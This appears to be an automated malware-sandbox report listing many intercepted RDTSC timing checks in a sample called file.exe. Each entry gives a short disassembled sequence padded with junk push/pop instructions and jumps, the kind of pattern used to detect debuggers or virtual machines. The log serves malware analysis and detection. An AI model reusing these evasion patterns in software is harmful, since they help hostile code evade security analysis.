                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D295C2 second address: D29606 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7981407BEEh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F7981407BF1h 0x00000011 pushad 0x00000012 jl 00007F7981407BE6h 0x00000018 jmp 00007F7981407BEFh 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A68C second address: D2A6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F7980D061C5h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31DE0 second address: D31E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BEEh 0x00000007 jmp 00007F7981407BEEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 jno 00007F7981407BE6h 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3239E second address: D323A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D324E9 second address: D324EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D327DD second address: D32807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F7980D061C9h 0x0000000a pop ecx 0x0000000b popad 0x0000000c ja 00007F7980D061D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32807 second address: D3280D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3280D second address: D32821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F7980D061B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F7980D061BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D387E9 second address: D387ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D387ED second address: D38816 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7980D061BEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7980D061BBh 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F7980D061B6h 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38984 second address: D3898A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C84AE2 second address: C84AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7980D061B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F3D7 second address: D3F3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F3DD second address: D3F408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jc 00007F7980D061B6h 0x0000000d jnl 00007F7980D061B6h 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7980D061C5h 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D456F8 second address: D4570E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 je 00007F7981407BF2h 0x0000000e jng 00007F7981407BE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C815BF second address: C815C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45092 second address: D4509E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7981407BE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4509E second address: D450A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45206 second address: D45213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F7981407BE6h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45213 second address: D45217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45217 second address: D4521D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45357 second address: D45368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45368 second address: D4538F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF5h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F7981407C0Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4538F second address: D45393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D50C6A second address: D50C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7981407BE6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D527EB second address: D527F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7980D061B6h 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D527F6 second address: D52804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7981407BEAh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55B1D second address: D55B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55B23 second address: D55B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55B27 second address: D55B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5709E second address: D570A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D570A8 second address: D570AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D570AE second address: D570C2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F7981407BEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D570C2 second address: D570CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007F7980D061C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D570CF second address: D570D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D570D5 second address: D570F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7980D061BFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D570F0 second address: D570FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A56A second address: D5A573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A573 second address: D5A579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A579 second address: D5A57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A57D second address: D5A581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A581 second address: D5A5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F7980D061BAh 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F7980D061BDh 0x00000016 pop eax 0x00000017 jc 00007F7980D061C2h 0x0000001d jng 00007F7980D061B6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A5B2 second address: D5A5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F7981407BF7h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A167 second address: D5A16B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F886 second address: D5F89F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F89F second address: D5F8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F8A5 second address: D5F8AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67116 second address: D67140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jo 00007F7980D061CEh 0x0000000f jmp 00007F7980D061C8h 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68E6A second address: D68E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68E6E second address: D68E7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F7980D061BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68CDD second address: D68CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68CE3 second address: D68CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7980D061BEh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70EE8 second address: D70F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007F7981407C0Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F7981407BEDh 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FA70 second address: D6FA8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7980D061C1h 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FFA3 second address: D6FFA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FFA9 second address: D6FFE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C7h 0x00000007 jmp 00007F7980D061C8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FFE0 second address: D6FFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7981407BE6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FFEA second address: D70013 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7980D061B6h 0x00000008 jmp 00007F7980D061BBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop esi 0x00000018 pushad 0x00000019 jbe 00007F7980D061B6h 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70C46 second address: D70C4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D741F7 second address: D74225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F7980D061C9h 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 jnc 00007F7980D061B6h 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74225 second address: D74229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7405C second address: D74060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74060 second address: D74075 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7981407BE6h 0x00000008 jns 00007F7981407BE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74075 second address: D7408D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007F7980D061D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7980D061BAh 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76151 second address: D7616A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F7981407BF2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7616A second address: D76189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F7980D061C6h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75DFA second address: D75E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75E00 second address: D75E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7980D061C8h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D777E0 second address: D777E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D777E4 second address: D777E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D777E8 second address: D777F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007F7981407BE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D840A5 second address: D840B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F7980D061B6h 0x0000000d js 00007F7980D061B6h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D840B8 second address: D840BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D840BC second address: D840E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7980D061C8h 0x0000000f jo 00007F7980D061B6h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D840E4 second address: D840E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89563 second address: D8956D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7980D061B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97FD0 second address: D97FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7981407BEBh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97FDF second address: D97FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97FE3 second address: D97FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3900 second address: DB3909 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3909 second address: DB3925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jg 00007F7981407BECh 0x0000000d pushad 0x0000000e jp 00007F7981407BE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3925 second address: DB394A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7980D061BCh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7980D061BEh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB2A3C second address: DB2A41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3079 second address: DB309C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F7980D061C4h 0x0000000b jo 00007F7980D061B6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB331E second address: DB3357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7981407BE6h 0x0000000a jnl 00007F7981407BEEh 0x00000010 popad 0x00000011 jc 00007F7981407C06h 0x00000017 jng 00007F7981407BEAh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7981407BEEh 0x00000024 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3630 second address: DB3634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3634 second address: DB363A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB363A second address: DB3640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3640 second address: DB3644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3644 second address: DB3648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB170 second address: DBB176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB176 second address: DBB180 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7980D061B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB180 second address: DBB186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB186 second address: DBB190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7980D061B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0008 second address: 50A000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A000C second address: 50A0029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0029 second address: 50A002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A002F second address: 50A0033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0033 second address: 50A004D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a movzx ecx, di 0x0000000d mov si, bx 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A004D second address: 50A0051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0051 second address: 50A0057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
